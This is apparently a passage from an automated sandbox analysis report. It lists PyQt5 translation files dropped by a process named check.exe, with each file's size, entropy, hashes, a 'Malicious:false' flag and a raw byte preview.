                                                                                                                                                                                                                                      SHA1:3FBA773D58E6D3699C20AB41AEE6801E71E2DDAE
                                                                                                                                                                                                                                      SHA-256:9117AAC2D07BC86DFA55A29B8825ED27C7093300FCC90E143E135E00E85F09D7
                                                                                                                                                                                                                                      SHA-512:C6B13655AFB206B0056F5656B4A9BF33CC267FCC928F6973258131CFA6443970510226FE45A041E5AA988809E17D0B11C7458F4A241C71521EDED186596C6055
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......it....v.....q.t.b.a.s.e._.i.t.....q.t.s.c.r.i.p.t._.i.t.....q.t.m.u.l.t.i.m.e.d.i.a._.i.t... .q.t.x.m.l.p.a.t.t.e.r.n.s._.i.t.......

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\translations\qt_ja.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):146
                                                                                                                                                                                                                                      Entropy (8bit):3.599979504080125
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/il/lAlHekd6hY1MUV6JAlI+rwtbWlMgel3UlIPldkOG:Cwz4+pjUGAIRt6qVUloiB
                                                                                                                                                                                                                                      MD5:8A1EE3433304838CCD0EBE0A825E84D8
                                                                                                                                                                                                                                      SHA1:2B3476588350C5384E0F9A51FF2E3659E89B4846
                                                                                                                                                                                                                                      SHA-256:23457CE8E44E233C6F85D56A4EE6A2CECD87C9C7BDDE6D8B8A925902EED1CD9C
                                                                                                                                                                                                                                      SHA-512:2D8ACD668DF537E98B27161F9FA49828EB2EB6E9CF41DB38E7F5D31F610D150CD1B580A8AE9B472A4DFDE4D4BF983C24A56293BB911CF5879368664E4D4CF3D2
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......ja....v.....q.t.b.a.s.e._.j.a.....q.t.s.c.r.i.p.t._.j.a.....q.t.m.u.l.t.i.m.e.d.i.a._.j.a... .q.t.x.m.l.p.a.t.t.e.r.n.s._.j.a

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\translations\qt_ko.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):146
                                                                                                                                                                                                                                      Entropy (8bit):3.652277257665055
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/rrr/lAlHekcQ/01MUUQMlI+rwtbWlMhQGlIPldkORn:CwCC+1Q/UUpIRt6SBloimn
                                                                                                                                                                                                                                      MD5:7B2659AF52B824EAC6C169CDD9467EE9
                                                                                                                                                                                                                                      SHA1:5727109218B222E3B654A8CC9933E970EB7C2118
                                                                                                                                                                                                                                      SHA-256:4CC1AF37E771F0A43898849CFF2CD42A820451B8D2B2E88931031629D781DB05
                                                                                                                                                                                                                                      SHA-512:E9475AC80BDBBEFF54F2724A2B6BA76992F18FD1913FD8EE1540A99FD7A112B79FED5A130B6AC6D7460E4420C06354FC6E4CF7770A7C6CBD3EAC1BDAF0082DE5
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......ko....v.....q.t.b.a.s.e._.k.o.....q.t.s.c.r.i.p.t._.k.o.....q.t.m.u.l.t.i.m.e.d.i.a._.k.o... .q.t.x.m.l.p.a.t.t.e.r.n.s._.k.o

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\translations\qt_lt.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):165383
                                                                                                                                                                                                                                      Entropy (8bit):4.805977227348512
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:i5v3+zmayloj6yJjhnBAbnrKnGrhA7WgdXclIsooY9i:SvOzAloj6yJ9BA7riGr+7WKXc+s5ui
                                                                                                                                                                                                                                      MD5:8992B652D1499F5D2F12674F3F875A35
                                                                                                                                                                                                                                      SHA1:E22766A49612F79156C550D83C6C230345DDA433
                                                                                                                                                                                                                                      SHA-256:47EB5F97467DF769261421D54A5BEA1131C9FB9B6388791D38BB6574335B64BF
                                                                                                                                                                                                                                      SHA-512:9B8B6DBFF432F2A46C14BC183A6BAF84ACBF02BF2C5BB8C306C6538FBD9BE1C0A9015BD46728F2F652F9163AFC56B1E16D16EB95D8F7728F3C562AE9F4F1AE1E
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......ltB..0X...*..)C...+...|......P....@..9....A..9....B..:....C..:....D..;....E..;....F..<6...G..<....H..=)...I..=....P..>q...Q..>....R..?....S..@f...T..@....U..A\...V..B....W..B....X..C....Y..Cy...]..k....t..........t>......th......t.......pd...;..J'...;.._h...;.......;...{...;..J....;...)...M..l....O...R...O...............}..l9...m..lo......^S..(5..P{..+;..4...+;......+;......+O..4...+O......1...^...E@..?p..F...C...H4......HY......H.......I...D...I@..s...IA..t...IC...2..J.......J....Y..J.......J.......K...9...LD...`..L.......PS......R.......T...q...Zr...`..[`......[`..&@..\....e..\....b.._......._....P..1........E..........5........L..1...O...1...PP......7......../...........$.......$.......,.......y.......y..........K^..............x......8................L...E.......E.......E..*....................%..:....%.........0U.....W......Zo.....^....5.......0..I....0...F...0...|...0.......0.......0..+\...5...}.......... D...g.. D......+....j..,.......,.......<U...+..<U

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\translations\qt_lv.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):89
                                                                                                                                                                                                                                      Entropy (8bit):4.156834975253888
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/HzllldQlHekbxplUp1MUTJ+b:Cwv+DIUEb
                                                                                                                                                                                                                                      MD5:19F1B919BB531E9E12E7F707BEBD8497
                                                                                                                                                                                                                                      SHA1:46E82683CEA28D877C73A5CE02F965BB1130FC62
                                                                                                                                                                                                                                      SHA-256:03467738042A15676E504BA02CB326DCDB773B171FADA3CD62B7A0E0564314A0
                                                                                                                                                                                                                                      SHA-512:901D7B26CAC7A4D0FFDB39A1D25767B5BC71BED4AFBE788D70BF19D4C58A8295167111675AB45E743FDF4768AF874D69417414C01CF23D5C525A3F6C8BF7D21F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......lv....0.....q.t.b.a.s.e._.l.v.....q.t.s.c.r.i.p.t._.l.v........)....

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\translations\qt_pl.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):161
                                                                                                                                                                                                                                      Entropy (8bit):3.8693516202048612
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/5J/p/lAlHekHp/7KlI+rwtbWlM6Tl/z21MUPp/FOlIPldkOjehB:Cwr+26IRt6nFURkloiT
                                                                                                                                                                                                                                      MD5:D71EA9FEFD97464B178235150EC8759E
                                                                                                                                                                                                                                      SHA1:61026FE602FD1B8B442A0D341C6BD759EEC75488
                                                                                                                                                                                                                                      SHA-256:BD7DD0C2CAB119A973DC10C3BFF7499D9728B928B541F86056921B30C8DB78E6
                                                                                                                                                                                                                                      SHA-512:ECD76A7D8B8D733E635B2BFEA90A4CD387B83D9D8A4EB6D299F59FF22AAA8D617A4C886A825A1CDDD901925C7839E2C18BDD4E0CD84152641922B66B62663F77
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......pl....v.....q.t.b.a.s.e._.p.l.....q.t.m.u.l.t.i.m.e.d.i.a._.p.l.....q.t.s.c.r.i.p.t._.p.l... .q.t.x.m.l.p.a.t.t.e.r.n.s._.p.l............,..

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\translations\qt_pt.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):70334
                                                                                                                                                                                                                                      Entropy (8bit):4.732724622610353
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:768:OKGUuWW+WHjS0gMBd483+Y7bDPs4RHBloLUIltlzAJnx4nnliM1OPlOibLG:JGUuWPuSgm0Jn+n4Mhj
                                                                                                                                                                                                                                      MD5:6656500F7A28EF820AE9F97FD47FB5BB
                                                                                                                                                                                                                                      SHA1:CC112B9C9513BCF7497F3417168B4C8A9F7640A9
                                                                                                                                                                                                                                      SHA-256:2C1E7BBF5168A64B43752DD4C547601C0BDE6D610F8671FA3E3AF38597E84783
                                                                                                                                                                                                                                      SHA-512:5C3CBFCF86AF6B4D949C1D914CD379E512E73BA350AF661033A386EE7FB981FBFCB43D9A35FDE7656E17BB09F64F1469F84867A780573C3359D645269461D5A6
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......pt_PTB...(...*...9...+...e...]..6....;.......;..-....;..;`...;..};...;.......M..6....O... ...O...w...........}..7....m..7B..........+;......+;..8S..+;..>...+O......+O..8#..H4......H.......J......K.......LD...)..L....}..PS...l..Zr...B..[`...;..[`.....\...kU.._......._.......1...?...............8...............E............,..................p........0...............v...........%...O...%..G........4...0.......0..:....0..y....0..|....0.......0...X...5.......5...... D..=... D..Kn..+....L..,...>...,......<U..z...<U......<.......F...>...F.......H5...4..H5..=...H5..K...H5......f....p..f...1...f...;...f...I...f...|H..f.......f.......l....................b......<...............>.......L ...........`......`..._.......A......2....e...g...e..>D...e..LW................y...,.*.y.....*.y..o..*.y.....*.T..L..*.0..'..*.0....+F...y..+F......+f......+f...C..+.z..0..+.....d.+....p0.+.....R.+.z..0U.+.....u.+....8..+....Ct.+....L..+....y..+.....Z.+......+...pc.+.....+....0..

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\translations\qt_ru.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):164
                                                                                                                                                                                                                                      Entropy (8bit):3.984562388316898
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/oZlAlHekF8Op1MUNKJKlI+rwtbWlM4KKIPldkOSxRMugB:CwY+GIUgcIRt61oihM3
                                                                                                                                                                                                                                      MD5:F7A8C75408B9A34A2B185E76F51B7B85
                                                                                                                                                                                                                                      SHA1:065E987139C5FB809A6F9CDF3845BCD79707FDBB
                                                                                                                                                                                                                                      SHA-256:6492B267608C6FB76907BD8FCFC8F1EF57E9F4EBBC2E81ACA81715A88388F94A
                                                                                                                                                                                                                                      SHA-512:E768C5B438EC899801B22B1325F2244ACCC5E7C2EC5D270F510BC3CBC2D9A0536949C026DB7FB5862835E506A9F2020DEB2CC4001E7011FF974324542734F855
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......ru....v.....q.t.b.a.s.e._.r.u.....q.t.s.c.r.i.p.t._.r.u.....q.t.m.u.l.t.i.m.e.d.i.a._.r.u... .q.t.x.m.l.p.a.t.t.e.r.n.s._.r.u........)......,..

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\translations\qt_sk.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):157
                                                                                                                                                                                                                                      Entropy (8bit):3.7731953311404336
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/3xRlAlHekE8lgp1MUM8lMlI+rwtbWlM5UllyIPldkOfll6kchn:CwS0+t8CIUM86IRt6KUlsoi2CVh
                                                                                                                                                                                                                                      MD5:24C179481B5EF574F33E983A62A34D53
                                                                                                                                                                                                                                      SHA1:0A67F1ED8CA4A5182F504806F8D47D499789F2D2
                                                                                                                                                                                                                                      SHA-256:B6ADFFD889FF96BF195CB997327E7D7005A815CAD67823FA6915A19C2D9BB668
                                                                                                                                                                                                                                      SHA-512:4757F3693120DAB2FBB7BCF1734EA20B3E3D9056B4B4E934A3129D660CFDC6C58B230459DB55912AF24AD5692BD221830BE0FF91E41D3EECD9439E79AC23FFE6
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......sk....v.....q.t.b.a.s.e._.s.k.....q.t.s.c.r.i.p.t._.s.k.....q.t.m.u.l.t.i.m.e.d.i.a._.s.k... .q.t.x.m.l.p.a.t.t.e.r.n.s._.s.k...........

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\translations\qt_sl.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):228428
                                                                                                                                                                                                                                      Entropy (8bit):4.726953418955661
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:9zQH0hOtgmiAZu0eeAEv+v49JnnSmICgr3n7jhCQUeinqyU5UggtRLGrQ2LZO+Y1:RpUsSpGr36wsR
                                                                                                                                                                                                                                      MD5:D35A0FE35476BE8BD149CEE46E42B5E9
                                                                                                                                                                                                                                      SHA1:9F3C85C115A283E5230D1EEAD84C8CB73A71FA03
                                                                                                                                                                                                                                      SHA-256:C44E0313A9414CC0E490B65B0C036FA11BCA959353B228886547BC2C8492034F
                                                                                                                                                                                                                                      SHA-512:BEEB1751882AF081E80BE93F7464D4C6322B724EFA2CBD3E1CBE709181D380C1C57E770FA962BB706D6FCF4A8CB393E3F6E187C1F604F8CEEFB201CA3200BD1C
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......slB..<....*.......+.......@...C...A.......B...<...C.......D...2...E.......F...d...G.......H...W...I.......P.......Q.......R.......S...x...T.......U...n...V...%...W.......X.......Y.......]..g~...t...V.......f..................................;..G....;..[....;...q...;..ia...;... ...M..g....O.......O.......[..,e...........}..g....m..h........Q..(5......+;..2...+;...b..+;...i..+O..2...+O...4..1......E@......F.......H4......HY...%..H.......I.......I@......IA...9..IC......J...6...J.......J.......J...^...K...7...LD......L....n..PS...U..R.......T....=..Zr......[`...V..[`......\...!,..\...8U.._..."b.._.../h..1.......E...9......4...............5........e...................$...<...$..Z....[.......,.......y...L...y..].......H.......@.......J.......6........~..........E...O...E..+....E...~..............,1...%..8r...%...........^..............................5.......0..Gx...0.......0..P....0..h....0.......0.......5...^.......... D...... D......+....`..,.......,...-...<U

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\translations\qt_sv.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):65851
                                                                                                                                                                                                                                      Entropy (8bit):4.7906769989650515
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:4u6DkpgyKmRmG15mGM6iFPi6Q/qTlOQZY2dKN8gKw:4u6DotUG1sGMZPi6Q/qTlO2Y2YKw
                                                                                                                                                                                                                                      MD5:0E85E0E0E7DDFE3D4BDE302F27047F9C
                                                                                                                                                                                                                                      SHA1:AE59348E0C2E4F86F99DA6CF5DAB3B7E92504B7C
                                                                                                                                                                                                                                      SHA-256:4B4B6FF7FD237C9DA0301B4946132E68653D15EB5FAF38E4C5FBFEBB12DD97F7
                                                                                                                                                                                                                                      SHA-512:8CAAB6C61E9FA26A3A289A9E4DC515D157B3092D6D4ED43861220261BD2B7CC79B35B52F9ADE4EF558B5385B37EAC14575420DD55C475F435BB95B6C1E2561B6
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`...B.......*.......+...i...]..6....;.......;..-f...;..:;...;..t....;.......M..64...O.......O...........q...}..6\...m..6........(..+;......+;..7...+;..=...+O......+O..7c..H4......H.......J.......K....F..LD...+..L.......PS...N..Zr......[`...7..[`...N..\...h4.._....J.._....k..1...>...............7........}......D............,...........*......i....................................%.......%..Fc.......6...0.......0..9....0..q....0..t....0.......0.......5.......5...... D..<}.. D..I...+.......,...=X..,.......<U..r...<U...n..<.......F...=...F....F..H5......H5..<...H5..J4..H5......f.......f...1V..f...:f..f...H;..f...t&..f.......f.......l..................8......;z..............<.......Je.......6...`...&...`...!.......9......1....e.......e..=....e..J..............g...y.....*.y.../.*.y..h..*.y.....*.T..J..*.0..'[.*.0...K.+F...q..+F.....+f......+f...A..+.z../..+.......+....i`.+.....X.+.z../..+.....S.+....7..+....Bi.+....K..+....q..+.......+......+...i..+.....+....0..F0i.....G.

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\translations\qt_tr.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):110
                                                                                                                                                                                                                                      Entropy (8bit):3.630483009136986
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/7zl9lAlHekDN/01MULV4LlI+rwtbWlM+N:Cw5+wUGRIRt6n
                                                                                                                                                                                                                                      MD5:16CDF5B9D48B0F795D532A0D07F5C3A0
                                                                                                                                                                                                                                      SHA1:6E403C9096B3051973E2B681DFEBBC8DD024830D
                                                                                                                                                                                                                                      SHA-256:F574A2CFD4715885C3DBDF5AE60995252673BD94FDAA9586F7E0586F6C1AC0EE
                                                                                                                                                                                                                                      SHA-512:36A0431368010157EA8A45DCB00458076CCFFC08B37E443DEBD1AAD4A30C6080803337725A7A3DCBF2B410DC7BE89CEAF6C07C46F876E4EF5B08159E3BF38E6D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......tr....R.....q.t.b.a.s.e._.t.r.....q.t.s.c.r.i.p.t._.t.r.....q.t.m.u.l.t.i.m.e.d.i.a._.t.r

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\translations\qt_uk.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):164
                                                                                                                                                                                                                                      Entropy (8bit):4.021402900389864
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/ZlRlAlHekCczOp1MUKUt7KlI+rwtbWlM/cFKIPldkONRMugB:CwUl0+rjIUKUcIRt6M/oioM3
                                                                                                                                                                                                                                      MD5:9B101363343847FE42167183320C03F0
                                                                                                                                                                                                                                      SHA1:F0DF2CFF913E588B7CADFDABBF69F4F632B2F96A
                                                                                                                                                                                                                                      SHA-256:F1621E680E1642F9463E4B07E7E78B50F9A7BDB7C321D7302039CB3405CBDEA4
                                                                                                                                                                                                                                      SHA-512:DA14FDF8DB514902733CAAC492293873351C595EBBE0ACB0849BECE24AB822602EE64D01051F1426CD1FC13A95D8607302CF9B515D9806FDD3BD047087DE447C
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......uk....v.....q.t.b.a.s.e._.u.k.....q.t.s.c.r.i.p.t._.u.k.....q.t.m.u.l.t.i.m.e.d.i.a._.u.k... .q.t.x.m.l.p.a.t.t.e.r.n.s._.u.k........)......,..

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\translations\qt_zh_CN.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):117347
                                                                                                                                                                                                                                      Entropy (8bit):5.8593733369029195
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:51dXW89nqEFu54aekvRzHHSVuf8j2+/xc3lhnbsfdAoz/w:v9qEFeLekvRznSVHJG3lhn+djY
                                                                                                                                                                                                                                      MD5:0D02F0DE5A12BCB338B7042DFBDAACF3
                                                                                                                                                                                                                                      SHA1:B7C10D249D8986AD8C6939B370407D07227A39F5
                                                                                                                                                                                                                                      SHA-256:28CDE75D7B32C81FEF1D4630C37B79A61DEC24B357632FF00D6365A57D8BE43B
                                                                                                                                                                                                                                      SHA-512:21F02EBA36B4411921EA3C70310B8E454E8FC2B8F09957FD6A63B71689DC381F7A5E2C3BDF2810734D659AB43D8A7BD46EF6436ECC52F75C71B5F5C313365444
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......zhB..+....*.......+.......@.......A...8...B.......C.......D.......E...V...F.......G...L...H.......I...9...P.......Q...e...R...^...S.......T...T...U.......V...|...W.......X...o...Y.......]..4 ...;...2...;..,....;..8....;.......;.......M..4H...O.......O...........#...}..4p...m..4........N..(5......+;...f..+;..6Y..+;..<...+O...8..+O..6'..1......E@......F....Y..H4..."..HY..J...H.......I.......J.......J.......K....5..LD..._..L......PS...V..Q....6..R...N...W..../..Zr.....[`.....[`......\...lU.._......._....L..1...<........j......6...............B........I...$..K....$.......,...g...y...3.......A......r...........................9..L7......;w...E..5b...E...G.......5...%.......%..D........`......*........................0.......0..8W...0..}y...0...6...0.......0.......5.......5...... D..:... D..J...+....R..,...;...,......<U..~...<U......<......F...;...F......H5...i..H5..:...H5..Jk..H5...w..VE...[..f....u..f...0X..f...9...f...E...f.......f.......f....j..g....A..l.

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\translations\qt_zh_TW.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):141
                                                                                                                                                                                                                                      Entropy (8bit):3.7198292994386235
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/0N6xg/Rl/gl+kNXDelHrwtbWlMwTolIPldkOfDn:CwOO2+g6Mt63oloiUn
                                                                                                                                                                                                                                      MD5:ED4135D705AEF3D97F8BF6B8FF11F09C
                                                                                                                                                                                                                                      SHA1:308E2B8F74B863A61AD0B68F4A18ED06965EBEAA
                                                                                                                                                                                                                                      SHA-256:751ECDA0C33E061D91241268357FBD2F6B7F70A1116E714F28D22EFD61EC7A1A
                                                                                                                                                                                                                                      SHA-512:B6E6D00553A9C427130129B9D30E862028E549F372A832F0F05747C8E2A79E443F4932EC3AE177537C8BA00D26B5B6CB97D5B35426AB5229F6A468CA485BE0B1
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......zh_TW....n.....q.t.b.a.s.e._.z.h._.T.W...$.q.t.m.u.l.t.i.m.e.d.i.a._.z.h._.T.W...&.q.t.x.m.l.p.a.t.t.e.r.n.s._.z.h._.T.W

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\translations\qtbase_ar.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):160017
                                                                                                                                                                                                                                      Entropy (8bit):5.35627970915292
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:XGlAMfkX1M0RdaCkR8lfv8vtc8EFrVYA2I4AJZWEWgHg1C8COvzHKHC6Jp9NV0V7:XUr0RACkIwDEpV1Lgf1ubtw3Bb
                                                                                                                                                                                                                                      MD5:A7E4D0BA0FC5DF07F62CC66EC9878979
                                                                                                                                                                                                                                      SHA1:21FD131B23BDD1BBA7BBB86F3ED5C83876F45638
                                                                                                                                                                                                                                      SHA-256:E03FE68D83201543698FD7FE267DD5DFC5BFD195147E74FF2F19AC3491401263
                                                                                                                                                                                                                                      SHA-512:D9E6B10506FCF20B5B783F011908083D9DF6C5DF88E21B10D07F53A01AD6506A4B921C85335A25BAE54E27BAD7D01B6E240D58FDEEAABC7FF32014EC120C2ECF
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......arB..2....*.......+.......@.......A.......B..._...C......D.......E......F.......G... ...H...D...I...h...P...C...Q...g...R......S.......T.......U.......V...x...W......X.......Y.......]..'=...s......t...........]...........;..'....;..(....;.......;.......M..'e...O.......O...9...........}..'........C...=......m..'....t..........!o..(5...Z..+;..5u..+;..c...+O......1...!...D@...8..E@.....H4...,..HY..QI..H.......IC......J....1..J.......J.......LD......L.......PS......QR...R..R...V2..T.......U....]..X.......Zr.....[`......\....t..]x......_......._.......yg......1...6....E..8V..............C............................$..RN...[...0...,.......y.......y...................K...........9..R....E.."............z.......................%..F;...D...[..................................!....5.......0...I...0.......0...5...0..#....5.......5...p..............W}.. D..(... D..P=..+.......<U......<U......<.......H5..(...H5..P...L.......VE......VE......V....B..f...JJ..f.......f.

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\translations\qtbase_bg.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):165337
                                                                                                                                                                                                                                      Entropy (8bit):5.332219158085151
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:9ULiyUxPoT6qx+J7FJlaaMJnxjqxq+0Uiff0mbVeb7wiEwYuYqDKBkKHMXHCIMll:9ULpIVFnpwUiEujw27ncUQUz
                                                                                                                                                                                                                                      MD5:660413AD666A6B31A1ACF8F216781D6E
                                                                                                                                                                                                                                      SHA1:654409CDF3F551555957D3DBCF8D6A0D8F03A6C5
                                                                                                                                                                                                                                      SHA-256:E448AC9E3F16C29EB27AF3012EFE21052DAA78FABFB34CD6DFF2F69EE3BD3CDB
                                                                                                                                                                                                                                      SHA-512:C6AE4B784C3D302D7EC6B9CE7B27DDAF00713ADF233F1246CD0475697A59C84D6A86BAA1005283B1F89FCC0835FD131E5CF07B3534B66A0A0AA6AC6356006B8F
                                                                                                                                                                                                                                      Malicious:false
